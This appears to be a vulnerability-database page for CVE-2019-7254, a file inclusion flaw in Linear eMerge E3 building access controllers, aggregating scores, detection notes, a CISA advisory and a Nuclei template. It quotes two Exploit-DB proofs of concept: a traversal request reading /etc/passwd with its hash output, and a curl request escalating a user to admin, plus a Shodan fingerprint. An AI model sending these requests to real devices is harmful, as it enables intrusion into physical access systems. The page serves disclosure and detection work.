CVE-2019-7254
published 2019-07-02CVE-2019-7254: Linear eMerge E3-Series devices allow File Inclusion.
PriorityP181high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
82.04%
99.6th percentile
Linear eMerge E3-Series devices allow File Inclusion.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nortekcontrol | linear_emerge_elite_firmware | <= 1.00-06 | — |
| nortekcontrol | linear_emerge_essential_firmware | <= 1.00-06 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated LFI via the `c` parameter using null-byte termination (%00) in GET requests to the root path of eMerge E3 devices. ↗
- →Detect LFI attempts via the `tpl` parameter in badge_print_v0.php and badge_template_print.php, and via the `layout` parameter in badge_template_v0.php. ↗
- →Shodan/FOFA fingerprint for exposed eMerge E3 devices: search for HTTP title containing 'emerge'. ↗
- →Privilege escalation abuse: unauthenticated or low-privilege POST to /?c=webuser&m=update with UserRole=1 to elevate account privileges. ↗
- →Successful LFI exploitation can be confirmed by matching the regex `root:.*:0:0:` in HTTP 200 responses from the device. ↗
- ·The null-byte termination (%00) in the `c` parameter traversal path is specific to version 1.00-06 and may not work on patched or newer firmware versions. ↗
- ·The exploit was tested on firmware version 1.00-06 only; behavior on other versions is unconfirmed. ↗
- ·The privilege escalation PoC (CVE-2019-7259) reuses the same session cookie format; detections relying solely on PHPSESSID may produce false positives for legitimate sessions. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j85c-g589-f83h: Linear eMerge E3-Series devices allow File Inclusion
ghsa_unreviewed·2022-05-24
CVE-2019-7254 [HIGH] CWE-22 GHSA-j85c-g589-f83h: Linear eMerge E3-Series devices allow File Inclusion
Linear eMerge E3-Series devices allow File Inclusion.
VulnCheck
nortekcontrol linear_emerge_essential_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2019·CVSS 7.5
CVE-2019-7254 [HIGH] nortekcontrol linear_emerge_essential_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
nortekcontrol linear_emerge_essential_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Linear eMerge E3-Series devices allow File Inclusion.
Affected: nortekcontrol linear_emerge_essential_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2019-7254; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2019-7254; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-17&host_type=src&vulnerabili
CISA ICS
Nice Linear eMerge E3-Series
cisa_ics·2024-03-05·CVSS 9.8
[CRITICAL] Nice Linear eMerge E3-Series
ICS Advisory
##
Nice Linear eMerge E3-Series
Release DateMarch 05, 2024
Alert CodeICSA-24-065-01
View CSAF
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low attack complexity/public exploits are available
- Vendor: Nice
- Equipment: Linear eMerge E3-Series
- Vulnerabilities: Path traversal, Cross-site scripting, OS command injection, Unrestricted Upload of File with Dangerous Type, Incorrect Authorization, Exposure of Sensitive Information to an Authorized Actor, Insufficiently Protected Credentials, Use of Hard-coded Credentials, Cross-site Request Forgery, Out-of-bounds Write
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow a remote attacker to gain full system access.
## 3. TECHNICAL DETAILS
No detection rules found.
Exploit-DB
eMerge E3 1.00-06 - Unauthenticated Directory Traversal
exploitdb·2019-11-12·CVSS 7.5
CVE-2019-7254 [HIGH] eMerge E3 1.00-06 - Unauthenticated Directory Traversal
eMerge E3 1.00-06 - Unauthenticated Directory Traversal
---
# Exploit Title: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
# Google Dork: NA
# Date: 2018-09-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7254
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC
GET /?c=../../../../../../etc/passwd%00
Host: 192.168.1.2
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:
Exploit-DB
eMerge E3 1.00-06 - Privilege Escalation
exploitdb·2019-11-12·CVSS 7.5
CVE-2019-7254 [HIGH] eMerge E3 1.00-06 - Privilege Escalation
eMerge E3 1.00-06 - Privilege Escalation
---
# Exploit Title: eMerge E3 1.00-06 - Privilege Escalation
# Google Dork: NA
# Date: 2018-09-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7254, CVE-2019-7259
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC
# Escalate:
curl "http://192.168.1.2/?c=webuser&m=update" -X POST –-data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24"
Nuclei
eMerge E3 1.00-06 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2019-7254 [HIGH] eMerge E3 1.00-06 - Local File Inclusion
eMerge E3 1.00-06 - Local File Inclusion
Linear eMerge E3-Series devices are vulnerable to local file inclusion.
Template:
id: CVE-2019-7254
info:
name: eMerge E3 1.00-06 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Linear eMerge E3-Series devices are vulnerable to local file inclusion.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
remediation: |
Apply the latest security patch or update to a non-vulnerable version of eMerge E3.
reference:
- https://www.exploit-db.com/exploits/47616
- https://applied-risk.com/labs/advisories
- https://www.applied-risk.com/resources/ar-2019-005
- http://packetstormsecurity.com/files/155252/Lin
http://packetstormsecurity.com/files/155252/Linear-eMerge-E3-1.00-06-Directory-Traversal.htmlhttps://applied-risk.com/labs/advisorieshttps://www.applied-risk.com/resources/ar-2019-005http://packetstormsecurity.com/files/155252/Linear-eMerge-E3-1.00-06-Directory-Traversal.htmlhttps://applied-risk.com/labs/advisorieshttps://www.applied-risk.com/resources/ar-2019-005
2019-07-02
Published
Exploited in the wild